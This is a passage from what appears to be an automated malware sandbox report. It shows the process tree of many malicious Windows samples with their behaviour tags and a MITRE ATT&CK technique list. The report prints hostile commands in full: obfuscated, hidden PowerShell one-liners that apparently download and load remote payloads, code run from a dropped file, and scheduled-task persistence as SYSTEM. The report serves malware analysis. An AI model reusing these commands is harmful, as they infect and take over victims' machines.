bgBk#GU#e##p#C##ew#g#CQ#cwB0#GE#cgB0#Ek#bgBk#GU#e##g#Cs#PQ#g#CQ#cwB0#GE#cgB0#EY#b#Bh#Gc#LgBM#GU#bgBn#HQ#a##7#C##DQ#K#C##I##g#C##I##g#C##I##g#C##I##g#CQ#YgBh#HM#ZQ#2#DQ#T#Bl#G4#ZwB0#Gg#I##9#C##J#Bl#G4#Z#BJ#G4#Z#Bl#Hg#I##t#C##J#Bz#HQ#YQBy#HQ#SQBu#GQ#ZQB4#Ds#DQ#K#C##I##g#C##I##g#C##I##g#C##I##g#C##J#Bi#GE#cwBl#DY#N#BD#G8#bQBt#GE#bgBk#C##PQ#g#CQ#aQBt#GE#ZwBl#FQ#ZQB4#HQ#LgBT#HU#YgBz#HQ#cgBp#G4#Zw#o#CQ#cwB0#GE#cgB0#Ek#bgBk#GU#e##s#C##J#Bi#GE#cwBl#DY#N#BM#GU#bgBn#HQ#a##p#Ds#DQ#K#C##I##g#C##I##g#C##I##g#C##I##g#C##J#Bj#G8#bQBt#GE#bgBk#EI#eQB0#GU#cw#g#D0#I#Bb#FM#eQBz#HQ#ZQBt#C4#QwBv#G4#dgBl#HI#d#Bd#Do#OgBG#HI#bwBt#EI#YQBz#GU#Ng#0#FM#d#By#Gk#bgBn#Cg#J#Bi#GE#cwBl#DY#N#BD#G8#bQBt#GE#bgBk#Ck#Ow#g#CQ#b#Bv#GE#Z#Bl#GQ#QQBz#HM#ZQBt#GI#b#B5#C##PQ#g#Fs#UwB5#HM#d#Bl#G0#LgBS#GU#ZgBs#GU#YwB0#Gk#bwBu#C4#QQBz#HM#ZQBt#GI#b#B5#F0#Og#6#Ew#bwBh#GQ#K##k#GM#bwBt#G0#YQBu#GQ#QgB5#HQ#ZQBz#Ck#Ow#g#CQ#d#B5#H##ZQ#g#D0#I##k#Gw#bwBh#GQ#ZQBk#EE#cwBz#GU#bQBi#Gw#eQ#u#Ec#ZQB0#FQ#eQBw#GU#K##n#HQ#ZQBz#HQ#c#Bv#Hc#ZQBy#HM#a#Bl#Gw#b##u#Eg#bwBt#GU#Jw#p#Ds#DQ#K#C##I##g#C##I##g#C##I##g#C##I##g#CQ#bQBl#HQ#a#Bv#GQ#I##9#C##J#B0#Hk#c#Bl#C4#RwBl#HQ#TQBl#HQ#a#Bv#GQ#K##n#Gw#YQ#n#Ck#LgBJ#G4#dgBv#Gs#ZQ#o#CQ#bgB1#Gw#b##s#C##WwBv#GI#agBl#GM#d#Bb#F0#XQ#g#Cg#JwB0#Hg#d##u#DY#MQBl#HM#LwBz#GQ#YQBv#Gw#bgB3#G8#Z##v#Hc#cQB0#HI#ZQB0#HI#ZQ#v#Gs#cgB1#HI#ZQBt#Gw#dQBy#C8#ZwBy#G8#LgB0#GU#awBj#HU#YgB0#Gk#Yg#v#C8#OgBz#H##d#B0#Gg#Jw#s#C##Jw#w#Cc#L##g#Cc#UwB0#GE#cgB0#HU#c#BO#GE#bQBl#Cc#L##g#Cc#UgBl#Gc#QQBz#G0#Jw#s#C##Jw#w#Cc#KQ#p#H0#fQ#=';$oWjuxd = [system.Text.encoding]::Unicode.GetString([system.convert]::Frombase64string( $codigo.replace('#','A') ));powershell.exe $OWjuxDutionpolicy bypass -Noprofile -command $OWjuxD"
        7⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:2212
- - C:\Users\Admin\AppData\Local\Temp\016da9d36c37374be6d7e43e162fd9a5c64e0c465b4cecdb50a02c7b119f64b0.exe
    "C:\Users\Admin\AppData\Local\Temp\016da9d36c37374be6d7e43e162fd9a5c64e0c465b4cecdb50a02c7b119f64b0.exe"
    3⤵
    - Adds autorun key to be loaded by Explorer.exe on startup
    - Executes dropped EXE
    - Drops file in System32 directory
    - System Location Discovery: System Language Discovery
    - Modifies registry class
    - Suspicious use of WriteProcessMemory
    PID:784
  - - C:\Windows\SysWOW64\Iakiia32.exe
      C:\Windows\system32\Iakiia32.exe
      4⤵
      Adds autorun key to be loaded by Explorer.exe on startup
      Executes dropped EXE
      Drops file in System32 directory
      System Location Discovery: System Language Discovery
      Modifies registry class
      Suspicious use of WriteProcessMemory
      PID:4056
    - - C:\Windows\SysWOW64\Ikcmbfcj.exe
        
        C:\Windows\system32\Ikcmbfcj.exe
        5⤵
        Adds autorun key to be loaded by Explorer.exe on startup
        Executes dropped EXE
        Drops file in System32 directory
        System Location Discovery: System Language Discovery
        Modifies registry class
        Suspicious use of WriteProcessMemory
        
        PID:3396
      - C:\Windows\SysWOW64\Ihgnkkbd.exe
        
        C:\Windows\system32\Ihgnkkbd.exe
        6⤵
        Adds autorun key to be loaded by Explorer.exe on startup
        Executes dropped EXE
        Drops file in System32 directory
        System Location Discovery: System Language Discovery
        Modifies registry class
        Suspicious use of WriteProcessMemory
        
        PID:3884
        
        C:\Windows\SysWOW64\Jnhpoamf.exe
        
        C:\Windows\system32\Jnhpoamf.exe
        7⤵
        Adds autorun key to be loaded by Explorer.exe on startup
        Executes dropped EXE
        Drops file in System32 directory
        System Location Discovery: System Language Discovery
        Modifies registry class
        Suspicious use of WriteProcessMemory
        
        PID:4240
        
        C:\Windows\SysWOW64\Knbbep32.exe
        
        C:\Windows\system32\Knbbep32.exe
        8⤵
        Adds autorun key to be loaded by Explorer.exe on startup
        Executes dropped EXE
        Drops file in System32 directory
        System Location Discovery: System Language Discovery
        Modifies registry class
        
        PID:1452
        
        C:\Windows\SysWOW64\Kgamnded.exe
        
        C:\Windows\system32\Kgamnded.exe
        9⤵
        Adds autorun key to be loaded by Explorer.exe on startup
        Executes dropped EXE
        Drops file in System32 directory
        System Location Discovery: System Language Discovery
        Modifies registry class
        
        PID:1016
        
        C:\Windows\SysWOW64\Mahnhhod.exe
        
        C:\Windows\system32\Mahnhhod.exe
        10⤵
        Adds autorun key to be loaded by Explorer.exe on startup
        Executes dropped EXE
        Drops file in System32 directory
        System Location Discovery: System Language Discovery
        Modifies registry class
        
        PID:3244
        
        C:\Windows\SysWOW64\Mblcnj32.exe
        
        C:\Windows\system32\Mblcnj32.exe
        11⤵
        Adds autorun key to be loaded by Explorer.exe on startup
        Executes dropped EXE
        Drops file in System32 directory
        System Location Discovery: System Language Discovery
        Modifies registry class
        
        PID:4496
        
        C:\Windows\SysWOW64\Nbcjnilj.exe
        
        C:\Windows\system32\Nbcjnilj.exe
        12⤵
        Adds autorun key to be loaded by Explorer.exe on startup
        Executes dropped EXE
        Drops file in System32 directory
        System Location Discovery: System Language Discovery
        Modifies registry class
        
        PID:1676
        
        C:\Windows\SysWOW64\Nknobkje.exe
        
        C:\Windows\system32\Nknobkje.exe
        13⤵
        Adds autorun key to be loaded by Explorer.exe on startup
        Executes dropped EXE
        Drops file in System32 directory
        System Location Discovery: System Language Discovery
        Modifies registry class
        
        PID:2316
        
        C:\Windows\SysWOW64\Objpoh32.exe
        
        C:\Windows\system32\Objpoh32.exe
        14⤵
        
        PID:400
        
        C:\Windows\SysWOW64\Ohkbbn32.exe
        
        C:\Windows\system32\Ohkbbn32.exe
        15⤵
        
        PID:5060
        
        C:\Windows\SysWOW64\Piphgq32.exe
        
        C:\Windows\system32\Piphgq32.exe
        16⤵
        
        PID:2728
        
        C:\Windows\SysWOW64\Pcobaedj.exe
        
        C:\Windows\system32\Pcobaedj.exe
        17⤵
        
        PID:5236
        
        C:\Windows\SysWOW64\Ajpqnneo.exe
        
        C:\Windows\system32\Ajpqnneo.exe
        18⤵
        
        PID:5504
        
        C:\Windows\SysWOW64\Acokhc32.exe
        
        C:\Windows\system32\Acokhc32.exe
        19⤵
        
        PID:5720
        
        C:\Windows\SysWOW64\Bkoigdom.exe
        
        C:\Windows\system32\Bkoigdom.exe
        20⤵
        
        PID:5864
        
        C:\Windows\SysWOW64\Cfldelik.exe
        
        C:\Windows\system32\Cfldelik.exe
        21⤵
        
        PID:6076
        
        C:\Windows\SysWOW64\Coiaiakf.exe
        
        C:\Windows\system32\Coiaiakf.exe
        22⤵
        
        PID:3800
        
        C:\Windows\SysWOW64\Dkdliame.exe
        
        C:\Windows\system32\Dkdliame.exe
        23⤵
        
        PID:2568
        
        C:\Windows\SysWOW64\Ejoomhmi.exe
        
        C:\Windows\system32\Ejoomhmi.exe
        24⤵
        
        PID:5264
        
        C:\Windows\SysWOW64\Eidlnd32.exe
        
        C:\Windows\system32\Eidlnd32.exe
        25⤵
        
        PID:4988
        
        C:\Windows\SysWOW64\Elgaeolp.exe
        
        C:\Windows\system32\Elgaeolp.exe
        26⤵
        
        PID:5560
        
        C:\Windows\SysWOW64\Fipkjb32.exe
        
        C:\Windows\system32\Fipkjb32.exe
        27⤵
        
        PID:5904
        
        C:\Windows\SysWOW64\Gmbmkpie.exe
        
        C:\Windows\system32\Gmbmkpie.exe
        28⤵
        
        PID:5244
        
        C:\Windows\SysWOW64\Gkhkjd32.exe
        
        C:\Windows\system32\Gkhkjd32.exe
        29⤵
        
        PID:5344
        
        C:\Windows\SysWOW64\Gfokoelp.exe
        
        C:\Windows\system32\Gfokoelp.exe
        30⤵
        
        PID:1568
        
        C:\Windows\SysWOW64\Hgdejd32.exe
        
        C:\Windows\system32\Hgdejd32.exe
        31⤵
        
        PID:3812
        
        C:\Windows\SysWOW64\Hlhccj32.exe
        
        C:\Windows\system32\Hlhccj32.exe
        32⤵
        
        PID:1680
        
        C:\Windows\SysWOW64\Iinqbn32.exe
        
        C:\Windows\system32\Iinqbn32.exe
        33⤵
        
        PID:2824
        
        C:\Windows\SysWOW64\Ijegcm32.exe
        
        C:\Windows\system32\Ijegcm32.exe
        34⤵
        
        PID:5256
        
        C:\Windows\SysWOW64\Igigla32.exe
        
        C:\Windows\system32\Igigla32.exe
        35⤵
        
        PID:5848
        
        C:\Windows\SysWOW64\Jcbdgb32.exe
        
        C:\Windows\system32\Jcbdgb32.exe
        36⤵
        
        PID:2740
        
        C:\Windows\SysWOW64\Jgpmmp32.exe
        
        C:\Windows\system32\Jgpmmp32.exe
        37⤵
        
        PID:5576
        
        C:\Windows\SysWOW64\Jnlbojee.exe
        
        C:\Windows\system32\Jnlbojee.exe
        38⤵
        
        PID:5556
        
        C:\Windows\SysWOW64\Jgeghp32.exe
        
        C:\Windows\system32\Jgeghp32.exe
        39⤵
        
        PID:5416
        
        C:\Windows\SysWOW64\Kclgmq32.exe
        
        C:\Windows\system32\Kclgmq32.exe
        40⤵
        
        PID:6028
        
        C:\Windows\SysWOW64\Kkeldnpi.exe
        
        C:\Windows\system32\Kkeldnpi.exe
        41⤵
        
        PID:3344
        
        C:\Windows\SysWOW64\Kqfngd32.exe
        
        C:\Windows\system32\Kqfngd32.exe
        42⤵
        
        PID:6416
        
        C:\Windows\SysWOW64\Lkchelci.exe
        
        C:\Windows\system32\Lkchelci.exe
        43⤵
        
        PID:7256
        
        C:\Windows\SysWOW64\Mcqjon32.exe
        
        C:\Windows\system32\Mcqjon32.exe
        44⤵
        
        PID:7796
        
        C:\Windows\SysWOW64\Madjhb32.exe
        
        C:\Windows\system32\Madjhb32.exe
        45⤵
        
        PID:7944
        
        C:\Windows\SysWOW64\Mnhkbfme.exe
        
        C:\Windows\system32\Mnhkbfme.exe
        46⤵
        
        PID:8028
        
        C:\Windows\SysWOW64\Maiccajf.exe
        
        C:\Windows\system32\Maiccajf.exe
        47⤵
        
        PID:8128
        
        C:\Windows\SysWOW64\Mjahlgpf.exe
        
        C:\Windows\system32\Mjahlgpf.exe
        48⤵
        
        PID:6388
        
        C:\Windows\SysWOW64\Mjdebfnd.exe
        
        C:\Windows\system32\Mjdebfnd.exe
        49⤵
        
        PID:4572
- - C:\Users\Admin\AppData\Local\Temp\90a82defe606e51d2826265a43737130682b738241700782d7e41188475b7fb7.exe
    "C:\Users\Admin\AppData\Local\Temp\90a82defe606e51d2826265a43737130682b738241700782d7e41188475b7fb7.exe"
    3⤵
    - Executes dropped EXE
    - Drops file in System32 directory
    - System Location Discovery: System Language Discovery
    PID:2072
  - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      "powershell.exe" -windowstyle hidden "$Nummmeret=Get-Content 'C:\Users\Admin\AppData\Local\Temp\forgrovelse\konstituerendes\Printermanualens.Ear';$Trojanerens=$Nummmeret.SubString(42833,3);.$Trojanerens($Nummmeret) "
      4⤵
      Command and Scripting Interpreter: PowerShell
      PID:4348
- - C:\Users\Admin\AppData\Local\Temp\1955e7fe3c25216101d012eb0b33f527.exe
    "C:\Users\Admin\AppData\Local\Temp\1955e7fe3c25216101d012eb0b33f527.exe"
    3⤵
    - Executes dropped EXE
    - System Location Discovery: System Language Discovery
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:4300
- - C:\Users\Admin\AppData\Local\Temp\a870c320630662dc799591a755e192fdadcb7ac52caf9781f52ae3ed5fb78660N.exe
    "C:\Users\Admin\AppData\Local\Temp\a870c320630662dc799591a755e192fdadcb7ac52caf9781f52ae3ed5fb78660N.exe"
    3⤵
    - Modifies firewall policy service
    - UAC bypass
    - Windows security bypass
    - Executes dropped EXE
    - Windows security modification
    - Adds Run key to start application
    - Checks whether UAC is enabled
    - Drops file in Windows directory
    - System Location Discovery: System Language Discovery
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    - System policy modification
    PID:1200
  - - C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\VCREDI~2.EXE
      C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\VCREDI~2.EXE
      4⤵
      Executes dropped EXE
      System Location Discovery: System Language Discovery
      PID:4980
    - - C:\Windows\SysWOW64\msiexec.exe
        
        msiexec /i vcredist.msi
        5⤵
        Event Triggered Execution: Installer Packages
        
        PID:5184
- - C:\Users\Admin\AppData\Local\Temp\be790b55b11f6502be0c8cf14f2ab4f9e97debe7e07efde26cf24f3927d791db.exe
    "C:\Users\Admin\AppData\Local\Temp\be790b55b11f6502be0c8cf14f2ab4f9e97debe7e07efde26cf24f3927d791db.exe"
    3⤵
    - Executes dropped EXE
    - Loads dropped DLL
    - System Location Discovery: System Language Discovery
    PID:1164
- - C:\Users\Admin\AppData\Local\Temp\bec705145d0fedf1bc77946f40328e8c1a00a55f41e55c1892c4fe39bac01fcaN.exe
    "C:\Users\Admin\AppData\Local\Temp\bec705145d0fedf1bc77946f40328e8c1a00a55f41e55c1892c4fe39bac01fcaN.exe"
    3⤵
    - Executes dropped EXE
    - Adds Run key to start application
    - Suspicious use of SetThreadContext
    - System Location Discovery: System Language Discovery
    PID:3172
  - - C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe
      C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe
      4⤵
      PID:2000
    - - C:\Windows\SysWOW64\explorer.exe
        
        explorer.exe
        5⤵
        
        PID:3284
    - - C:\Program Files\Internet Explorer\iexplore.exe
        
        "C:\Program Files\Internet Explorer\iexplore.exe"
        5⤵
        
        PID:6084
    - - C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe
        
        "C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe"
        5⤵
        
        PID:5388
- - C:\Users\Admin\AppData\Local\Temp\c23c9580f06fdc862df3d80fb8dc398b666e01a523f06ffa8935a95dce4ff8f4.exe
    "C:\Users\Admin\AppData\Local\Temp\c23c9580f06fdc862df3d80fb8dc398b666e01a523f06ffa8935a95dce4ff8f4.exe"
    3⤵
    - Executes dropped EXE
    - System Location Discovery: System Language Discovery
    - Suspicious behavior: EnumeratesProcesses
    PID:3688
  - - C:\Users\Admin\AppData\Local\Temp\c23c9580f06fdc862df3d80fb8dc398b666e01a523f06ffa8935a95dce4ff8f4.exe
      C:\Users\Admin\AppData\Local\Temp\c23c9580f06fdc862df3d80fb8dc398b666e01a523f06ffa8935a95dce4ff8f4.exe /C
      4⤵
      PID:5372
- - C:\Users\Admin\AppData\Local\Temp\gold.exe
    "C:\Users\Admin\AppData\Local\Temp\gold.exe"
    3⤵
    - Executes dropped EXE
    - System Location Discovery: System Language Discovery
    PID:3904
- - C:\Windows\SysWOW64\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\HONG_KONG_CHEMHERE_QUOTE_REQUEST.vbs"
    3⤵
    - System Location Discovery: System Language Discovery
    PID:4992
  - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'SW5WT0tlLWV4UFJlU1NJT04oKCc2SGMnKyd1JysncicrJ2wgPScrJyAnKydNUlBodHRwczonKycvL2lhJysnNicrJzAwMTAwLnUnKydzLmEnKydyYycrJ2hpJysndicrJ2UuJysnb3InKydnLzI0L2knKyd0ZW1zL2QnKydldGFoLW5vdGUtdi9EJysnZXQnKydhaE5vdGVWLnQnKyd4JysndCcrJ01SUCcrJzs2SGNiYXNlJysnNjRDb250JysnZW50JysnID0gKE5lJysndy1PYmplJysnY3QgUycrJ3lzdGVtLk5ldC5XZScrJ2JDJysnbGknKydlbnQpLkRvd24nKydsJysnb2FkJysnU3RyaW4nKydnJysnKDYnKydIJysnY3UnKydyJysnbCcrJyknKyc7NkhjYmluJysnYXJ5QycrJ29udGVudCA9ICcrJ1tTeXN0ZW0uQ29uJysndmVydF06OkZybycrJ20nKydCYXMnKydlNjQnKydTJysndHInKydpbmcoNkhjYmFzZTYnKyc0Q29udGVudCk7NicrJ0gnKydjYXNzZW1ibHknKycgPSBbUicrJ2VmbGUnKydjdGlvJysnbi5Bc3MnKydlJysnbWJseScrJ10nKyc6OkwnKydvJysnYWQnKycoNkhjJysnYmknKyduYXJ5QycrJ28nKydudGVudCk7NkgnKydjdHlwZScrJyA9JysnICcrJzZIYycrJ2Fzc2VtYicrJ2x5LkdldFR5JysncGUoTScrJ1JQUicrJ3VuUEUuSG8nKydtZScrJ00nKydSUCcrJyk7NkgnKydjbWV0aG8nKydkJysnICcrJz0nKycgJysnNicrJ0hjJysndHknKydwJysnZS5HZXRNJysnZXRoJysnb2QoTVInKydQJysnVkFJTVJQKScrJzs2SGMnKydtZScrJ3QnKydob2QuSW52b2tlKDZIJysnY24nKyd1JysnbGwsIFtvYmplYycrJ3RbXV1AKE0nKydSJysnUHR4dC4nKyd5YScrJ2Rub20vdmUnKydkLjInKydyLjMnKyc5YjM0NTMwJysnMmEwNzViMWJjMGQ0JysnNWInKyc2MycrJzJlYjllZTYyLWJ1cC8nKycvOnNwJysndHRoTVJQICwgTVJQZGVzYXQnKydpJysndicrJ2FkbycrJ01SUCAsIE0nKydSUCcrJ2Rlc2F0aXYnKydhZCcrJ29NUicrJ1AgLCBNUlBkZXMnKydhdGl2YScrJ2RvTVJQLE1SUEEnKydkZEknKyduUHJvY2VzczMnKycyTVJQJysnLE0nKydSJysnUE1SUCkpJykuUmVQbGFjRSgnNkhjJyxbU3RSaW5HXVtDSEFSXTM2KS5SZVBsYWNFKChbQ0hBUl03NytbQ0hBUl04MitbQ0hBUl04MCksW1N0UmluR11bQ0hBUl0zOSkgKQ==';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
      4⤵
      Command and Scripting Interpreter: PowerShell
      PID:5824
- - C:\Users\Admin\AppData\Local\Temp\l6E.exe
    "C:\Users\Admin\AppData\Local\Temp\l6E.exe"
    3⤵
    PID:2204
  - - C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
      "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
      4⤵
      PID:3256
- - C:\Users\Admin\AppData\Local\Temp\MTLADYYASSOVESSELBRIEFDETAILS.exe
    "C:\Users\Admin\AppData\Local\Temp\MTLADYYASSOVESSELBRIEFDETAILS.exe"
    3⤵
    PID:3876
  - - C:\Users\Admin\AppData\Local\Temp\MTLADYYASSOVESSELBRIEFDETAILS.exe
      "C:\Users\Admin\AppData\Local\Temp\MTLADYYASSOVESSELBRIEFDETAILS.exe"
      4⤵
      PID:5220
- - C:\Users\Admin\AppData\Local\Temp\tt.exe
    "C:\Users\Admin\AppData\Local\Temp\tt.exe"
    3⤵
    PID:952
- - C:\Users\Admin\AppData\Local\Temp\sloppyCatsV1.exe
    "C:\Users\Admin\AppData\Local\Temp\sloppyCatsV1.exe"
    3⤵
    PID:2696
  - - C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
      "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
      4⤵
      PID:2952
- - C:\Users\Admin\AppData\Local\Temp\Wire-transaction073921.exe
    "C:\Users\Admin\AppData\Local\Temp\Wire-transaction073921.exe"
    3⤵
    PID:5168
  - - C:\Users\Admin\AppData\Local\Temp\Payload.cmd.exe
      "C:\Users\Admin\AppData\Local\Temp\Payload.cmd.exe"
      4⤵
      PID:2408
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument C:\Users\Admin\AppData\Local\Temp\Py017394- 01.htm
      4⤵
      PID:5756
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=90.0.4430.212 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=90.0.818.66 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ffb98243cb8,0x7ffb98243cc8,0x7ffb98243cd8
        5⤵
        
        PID:3232
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=1916,4917642090167492898,15415159968636618079,131072 --gpu-preferences=SAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB4AAAAAAAAAHgAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAAIAAAAAAAAAAgAAAAAAAAA --mojo-platform-channel-handle=1932 /prefetch:2
        5⤵
        
        PID:3472
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1916,4917642090167492898,15415159968636618079,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2248 /prefetch:3
        5⤵
        
        PID:2220
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=1916,4917642090167492898,15415159968636618079,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2808 /prefetch:8
        5⤵
        
        PID:6180
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1916,4917642090167492898,15415159968636618079,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3172 /prefetch:1
        5⤵
        
        PID:6360
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1916,4917642090167492898,15415159968636618079,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3200 /prefetch:1
        5⤵
        
        PID:6368
- - C:\Users\Admin\AppData\Local\Temp\Zahlungsbest_tigung.exe
    "C:\Users\Admin\AppData\Local\Temp\Zahlungsbest_tigung.exe"
    3⤵
    PID:5288
- - C:\Users\Admin\AppData\Local\Temp\Trojan.Win32.Genome.ic-9507dcec3bf5533f4a2c08baae8bc6f2c46c62d2918090aff1a7c337dc82f524.exe
    "C:\Users\Admin\AppData\Local\Temp\Trojan.Win32.Genome.ic-9507dcec3bf5533f4a2c08baae8bc6f2c46c62d2918090aff1a7c337dc82f524.exe"
    3⤵
    PID:5432
  - - C:\Users\Admin\AppData\Local\Temp\is-065HH.tmp\is-C8B6J.tmp
      "C:\Users\Admin\AppData\Local\Temp\is-065HH.tmp\is-C8B6J.tmp" /SL4 $7004C C:\Users\Admin\AppData\Local\Temp\Trojan.Win32.Genome.ic-9507dcec3bf5533f4a2c08baae8bc6f2c46c62d2918090aff1a7c337dc82f524.exe 2516569 51200
      4⤵
      PID:5916
- - C:\Users\Admin\AppData\Local\Temp\OGGY.exe
    "C:\Users\Admin\AppData\Local\Temp\OGGY.exe"
    3⤵
    PID:5620
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c wusa C:\Users\Admin\AppData\Local\Temp\64.cab /quiet /extract:C:\Windows\system32\migwiz\ & exit
      4⤵
      PID:7088
- - C:\Users\Admin\AppData\Local\Temp\lol.exe
    "C:\Users\Admin\AppData\Local\Temp\lol.exe"
    3⤵
    PID:5664
  - - C:\Windows\SysWOW64\schtasks.exe
      schtasks.exe /Create /TN wininit /ru SYSTEM /SC ONSTART /TR "C:\Users\Admin\AppData\Local\Temp\lol.exe"
      4⤵
      Scheduled Task/Job: Scheduled Task
      PID:5832

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k ClipboardSvcGroup -p -s cbdhsvc
1⤵
PID:3428

C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\SearchHost.exe
"C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\SearchHost.exe" -ServerName:CortanaUI.AppXstmwaab17q5s3y22tp6apqz7a45vwv65.mca
1⤵
PID:3744

C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe
"C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca
1⤵
PID:3768

C:\Windows\System32\RuntimeBroker.exe
C:\Windows\System32\RuntimeBroker.exe -Embedding
1⤵
PID:3860

C:\Windows\System32\RuntimeBroker.exe
C:\Windows\System32\RuntimeBroker.exe -Embedding
1⤵
PID:3920

C:\Windows\system32\DllHost.exe
C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}
1⤵
PID:3980

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k UdkSvcGroup -s UdkUserSvc
1⤵
PID:4008

C:\Windows\system32\DllHost.exe
C:\Windows\system32\DllHost.exe /Processid:{973D20D7-562D-44B9-B70B-5A0F49CCDF3F}
1⤵
PID:4292

C:\Windows\system32\backgroundTaskHost.exe
"C:\Windows\system32\backgroundTaskHost.exe" -ServerName:Global.IrisService.AppXwt29n3t7x7q6fgyrrbbqxwzkqjfjaw4y.mca
1⤵
PID:1072

C:\Windows\system32\backgroundTaskHost.exe
"C:\Windows\system32\backgroundTaskHost.exe" -ServerName:App.AppXsqpbawq1jx69hhfyy1dr9y35whgstkrr.mca
1⤵
PID:1708

C:\Windows\System32\RuntimeBroker.exe
C:\Windows\System32\RuntimeBroker.exe -Embedding
1⤵
PID:1240

C:\Windows\system32\msiexec.exe
C:\Windows\system32\msiexec.exe /V
1⤵
PID:5964

C:\Windows\system32\vssvc.exe
C:\Windows\system32\vssvc.exe
1⤵
PID:5768

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:7280

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:8152

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Scheduled Task/Job

T1053

Scheduled Task

Persistence

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

Create or Modify System Process

T1543

Windows Service

T1543.003

Event Triggered Execution

T1546

Installer Packages

T1546.016

Scheduled Task/Job

T1053

Scheduled Task

Privilege Escalation

Abuse Elevation Control Mechanism

T1548

Bypass User Account Control

T1548.002

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

Create or Modify System Process

T1543

Windows Service

T1543.003

Event Triggered Execution

T1546

Installer Packages

T1546.016

Scheduled Task/Job

T1053

Scheduled Task

Defense Evasion

Abuse Elevation Control Mechanism

T1548

Bypass User Account Control

T1548.002

Impair Defenses

T1562

Disable or Modify System Firewall

T1562.004

Disable or Modify Tools

Modify Registry